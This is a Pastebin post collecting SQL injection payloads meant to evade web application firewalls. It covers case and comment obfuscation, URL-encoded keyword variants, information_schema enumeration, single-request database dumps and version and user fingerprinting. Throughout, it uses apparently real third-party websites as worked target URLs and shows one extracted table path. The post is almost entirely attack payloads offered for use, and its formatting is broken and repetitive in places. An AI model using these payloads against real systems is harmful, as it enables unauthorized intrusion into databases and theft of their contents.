Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- WAF evasion methods for sql Injections
- I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.
- 1) id=1+UnIoN+SeLecT 1,2,3 --+
- 2) id=1+UnIOn/**/SeLect 1,2,3 --+
- 3) id=1+UNIunionON+SELselectECT 1,2,3 --+
- 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+
- 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+
- 6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+
- 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+
- 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+
- /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
- 9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
- div + 0
- Having +1 = 0
- AND+ 1 = 0
- /*!and*/ +1 = 0
- and( 1 )=(0 ) x
- OR false the url query
- id =- 1 union all select
- id =null union all select
- id =1 +and+ false + union +all +select
- id = 9999 union all select
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//
- http : //www.phm.ie/project.php?cat=Conservation'
- +and(1)=(0) +union+distinct+select+ 1
- and use: and 1=0 to apear column number in the page
- or
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- Hard WAF bypass tips
- Whitespaces :
- union(select(0),version(),(0),(0),(0),(0),(0),(0),
- (0))
- %0Aunion%0Aselect%0A1,2,3--
- /**/union/**/select/**/1,2,3--
- like ::
- PHP Code:
- http ://www.goavenues.com/
- list_itinerary.php?id=-4%20union
- %20%28select%201,2,version
- %28%29,4,5,6,7,8%29%20--
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- NICE QUERY
- www.zerocoolhf.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+
- www.zerocoolhf.altervista.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Bypassing ::
- (Double Keyword): UNIunionON+SELselectECT
- +union+distinct+select+
- +union+distinctROW+select+
- union+/*!select*/+1,2,3
- union/**/select/**/1,2,3
- uni<on all sel<ect
- %20union%20/*!select*/%20
- /**//*!union*//**//*!select*//**/
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /*!20000%0d%0aunion*/+/*!20000%0d
- %0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f
- %252a*/
- +%23sexsexsex%0AUnIOn%23sexsexsex
- %0ASeLecT+
- id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- like ::
- PHP Code:
- http ://www.goavenues.com/
- list_itinerary.php?id=-4%20union
- %23aa%0Aselect%201,2,version
- %28%29,4,5,6,7,8%20--
- PHP Code:
- http ://www.goavenues.com/
- list_itinerary.php?id=-4%20/**/
- union/*!50000select*/
- %201,2,version
- %28%29,4,5,6,7,8%20--
- PHP Code:
- http ://www.goavenues.com/
- list_itinerary.php?id=-4%20/*!
- 20000%0d%0aunion*/+/*!20000%0d
- %0aSelEct*/%201,2,version
- %28%29,4,5,6,7,8%20--
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- after id no. like id=1 +/*!and*/+1=0
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- false the url query :
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- id= - 1 union all select
- id= null union all select
- id=1 +and+false+ union+all+select
- id= 9999 union all select
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Order Bypassing do like this
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- /*!table_name*/
- +from /*!information_schema*/./*!tables*/ where
- table_schema=database()
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- unhex(hex(Concat
- (Column_Name,0x3e,Table_schema,0x3e,table_
- Name)))
- /*!from*/information_schema.columns/*!where*/
- column_name%20/*!like*/char(37,%20112,%2097,
- %20115,%20115,%2037)
- like ::
- PHP Code:
- http ://www.westbury.com/
- article.php?
- article_id=-117%20union%20select
- %201,2,unhex%28hex%28Concat
- %28Column_Name,0x3e,Table_
- schema, 0x3e,table_Name
- %29%29%29,4,5,6,7/*!from*/
- information_schema.columns/*!
- where*/column_name%20/*!like*/
- char%2837,%20112,%2097,%20115,
- %20115,%2037%29--
- user_passwd>westbur6_website>user_info
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- used with order ::
- convert( using ascii) or unhex(hex())
- like :
- PHP Code:
- www. westbury. com/ article. php?
- article_id =- 117 union select 1 , 2 ,
- convert ( group_concat
- (table_name ) using ascii ), 4 , 5 ,6 , 7 +
- from +information_schema .tables --
- IF'ascii' dosent work? you can try
- PHP Code:
- ujis
- ucs2
- tis620
- swe7
- sjis
- macroman
- macce
- latin7
- latin5
- latin2
- koi8u
- koi8r
- keybcs2
- hp8
- geostd8
- gbk
- gb2132
- armscii8
- ascii
- binary
- cp1250
- big5
- cp1251
- cp1256
- cp1257
- cp850
- ------------------------------Best Bypass WAF------------------------------------
- [~] order by [~]
- /**/ORDER/**/BY/**/
- /*!order*/+/*!by*/
- /*!ORDER BY*/
- /*!50000ORDER BY*/
- /*!50000ORDER*//**//*!50000BY*/
- /*!12345ORDER*/+/*!BY*/
- [~] UNION select [~]
- /*!50000%55nIoN*/ /*!50000%53eLeCt*/
- %55nion(%53elect 1,2,3)-- -
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/UNION/**//*!50000SELECT*//**/
- /*!50000UniON SeLeCt*/
- union /*!50000%53elect*/
- + #?uNiOn + #?sEleCt
- + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
- /*!%55NiOn*/ /*!%53eLEct*/
- /*!u%6eion*/ /*!se%6cect*/
- +un/**/ion+se/**/lect
- uni%0bon+se%0blect
- %2f**%2funion%2f**%2fselect
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- REVERSE(noinu)+REVERSE(tceles)
- /*--*/union/*--*/select/*--*/
- union (/*!/**/ SeleCT */ 1,2,3)
- /*!union*/+/*!select*/
- union+/*!select*/
- /**/union/**/select/**/
- /**/uNIon/**/sEleCt/**/
- +%2F**/+Union/*!select*/
- /**//*!union*//**//*!select*//**/
- /*!uNIOn*/ /*!SelECt*/
- +union+distinct+select+
- +union+distinctROW+select+
- uNiOn aLl sElEcT
- UNIunionON+SELselectECT
- /**/union/*!50000select*//**/
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- %55nion/**/%53elect
- uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*--*//*!all*//*--*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- union+sel%0bect
- +uni*on+sel*ect+
- +#1q%0Aunion all#qa%0A#%0Aselect
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- %23xyz%0AUnIOn%23xyz%0ASeLecT+
- %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
- union(select(1),2,3)
- union (select 1111,2222,3333)
- uNioN (/*!/**/ SeleCT */ 11)
- union (select 1111,2222,3333)
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
- %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
- +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
- +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
- +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
- /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
- /union\sselect/g
- /union\s+select/i
- /*!UnIoN*/SeLeCT
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +uni>on+sel>ect+
- +(UnIoN)+(SelECT)+
- +(UnI)(oN)+(SeL)(EcT)
- +’UnI”On’+'SeL”ECT’
- +uni on+sel ect+
- +/*!UnIoN*/+/*!SeLeCt*/+
- /*!u%6eion*/ /*!se%6cect*/
- uni%20union%20/*!select*/%20
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /^.*union.*$/ /^.*select.*$/
- /*union*/union/*select*/select+
- /*uni X on*/union/*sel X ect*/
- +un/**/ion+sel/**/ect+
- +UnIOn%0d%0aSeleCt%0d%0a
- UNION/*&test=1*/SELECT/*&pwn=2*/
- un?<ion sel="">+un/**/ion+se/**/lect+
- +UNunionION+SEselectLECT+
- +uni%0bon+se%0blect+
- %252f%252a*/union%252f%252a /select%252f%252a*/
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f**%2funion%2f**%2fselect%2f**%2f
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- /*!UnIoN*/SeLecT+
- [~] information_schema.tables [~]
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
- /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
- /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
- [~] concat() [~]
- CoNcAt()
- concat()
- CON%08CAT()
- CoNcAt()
- %0AcOnCat()
- /**//*!12345cOnCat*/
- /*!50000cOnCat*/(/*!*/)
- unhex(hex(concat(table_name)))
- unhex(hex(/*!12345concat*/(table_name)))
- unhex(hex(/*!50000concat*/(table_name)))
- [~] group_concat() [~]
- /*!group_concat*/()
- gRoUp_cOnCAt()
- group_concat(/*!*/)
- group_concat(/*!12345table_name*/)
- group_concat(/*!50000table_name*/)
- /*!group_concat*/(/*!12345table_name*/)
- /*!group_concat*/(/*!50000table_name*/)
- /*!12345group_concat*/(/*!12345table_name*/)
- /*!50000group_concat*/(/*!50000table_name*/)
- /*!GrOuP_ConCaT*/()
- /*!12345GroUP_ConCat*/()
- /*!50000gRouP_cOnCaT*/()
- /*!50000Gr%6fuP_c%6fnCAT*/()
- unhex(hex(group_concat(table_name)))
- unhex(hex(/*!group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(table_name)))
- unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
- unhex(hex(/*!50000group_concat*/(table_name)))
- unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
- unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
- convert(group_concat(table_name)+using+ascii)
- convert(group_concat(/*!table_name*/)+using+ascii)
- convert(group_concat(/*!12345table_name*/)+using+ascii)
- convert(group_concat(/*!50000table_name*/)+using+ascii)
- CONVERT(group_concat(table_name)+USING+latin1)
- CONVERT(group_concat(table_name)+USING+latin2)
- CONVERT(group_concat(table_name)+USING+latin3)
- CONVERT(group_concat(table_name)+USING+latin4)
- CONVERT(group_concat(table_name)+USING+latin5)
- Group_Concat
- group_concat ()
- /*!group_concat*/ ()
- grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
- group_concat (, 0x3c62723e )
- g % 72oup_c % 6Fncat % 28 % 76% 65rsion
- % 28 %29 ,% 22 ~ BlackRose% 22 %29
- CoNcAt ()
- CONCAT (DISTINCT Version ())
- concat (, 0x3a ,)
- concat %00 ()
- % 00CoNcAt ()
- /*!50000cOnCat*/ ( /*!Version()*/ )
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/ (, 0x3a ,)
- concat_ws ()
- concat (0x3a ,, 0x3c62723e )
- /*!concat_ws(0x3a,)*/
- concat_ws ( 0x3a3a3a , version()
- CONCAT_WS ( CHAR ( 32, 58, 32 ), version
- (),)
- REVERSE( tacnoc )
- binary (version ())
- uncompress (compress ( version()))
- aes_decrypt ( aes_encrypt ( version
- (), 1), 1 )[/ b ][/ u ][/ size ][/ color ]
- [~] after id no. like id=1 +/*!and*/+1=0 [~]
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- cp852
- cp866
- cp932
- dec8
- euckr
- latin1
- utf8
- trick to appear info inside img tag
- PHP Code:
- concat( 0x223e3c62723e ,, 0x3c696d
- 67207372633d22 )
- when the column is get into html tag,but its not
- always inside img tag.
- it could be <a> or </noscript> or anything.
- like ::
- PHP Code:
- http ://fzszy.chinacourt.org/
- public/detail.php?
- id=-168' union /*!
- %53elect*/ concat
- (0x223e3c2f613e3c2f74643e,
- version
- (),0x3c6120687265663d22)--+
- [DUMP DB in 1 Request]
- PHP Code:
- ( select (@) from ( select(@:= 0x00 ),
- ( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
- (@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
- ( select(@) from ( select (@:= 0x00 ),
- ( select (@) from ( table ) where (@) in (@:= concat
- (@, 0x0a , column1 , 0x3a , column2 )))) a )
- [DUMP DB in 1 Request improve]
- PHP Code:
- ( select(@ x ) from (select (@x := 0x00 ),
- ( select( 0 ) from
- ( information_schema . columns) where
- ( table_schema !
- = 0x696e666f726d6174696f6e5f736368656d61 )and
- ( 0x00 ) in(@ x := concat
- (@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
- like
- http : //www.marinaplast.com/page.php?
- id=-13 union select 1,2,(select
- (@x)from(select(@x:=0x00),(select
- (0)from(information_schema.colu
- mns)where(table_schema!
- =0x696e666f726d6174696f6e5f736368656d61)and
- (0x00)in(@x:=concat
- (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
- WHITESPACES BYPASS .
- %09 %0A %0B %0C %0D %A0
- get version - DB_NAME - user - HOST_NAME -
- datadir
- PHP Code:
- version()
- convert( version() using latin1 )
- unhex ( hex( version()))
- @@GLOBAL. VERSION
- ( substr
- (@@version ,1 , 1 )=5 ) :: 1 true 0 fals
- # like #
- www. marinaplast. com/ page . php?
- id =- 13 union select 1 , 2 ,( substr
- (@@version ,1 , 1 )=5 ), 4, 5 --
- 1 it 's mean version 5 and 0 mean version 4
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- # like #
- www.marinaplast.com/page.php?
- id=13+and substring(version
- (),1,1)=5
- download good version 5
- www.marinaplast.com/page.php?
- id=13+and substring(version
- (),1,1)=4
- not download good version 4
- version 5
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- # like #
- www.marinaplast.com/page.php?id=13 /
- *!50095aaaa*/ no error v5
- version 4
- id=1 /*!40123 1=1*/--+- no error
- id=1 /*!40122rrrr*/ no error
- # like #
- www.marinaplast.com/page.php?id=13 /
- *!40122rrrr*/ error not v4
- ☆¸.•*☆ ☆*•.¸☆
- DB_NAME()
- @@database
- database()
- id=vv()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,DB_NAME
- (),4,5 --
- www.marinaplast.com/page.php?id=vv
- ()
- ☆¸.•*☆ ☆*•.¸☆
- @@user
- user()
- user_name()
- system_user()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,user
- (),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- HOST_NAME()
- @@hostname
- @@servername
- SERVERPROPERTY()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,HOST_NAME
- (),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- @@datadir
- datadir()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,datadir(),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- ASPX
- and 1=0/@@version
- ' and 1 =0 /@@ version;--
- ) and 1 =@@version--
- and 1 = 0 /user ;--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement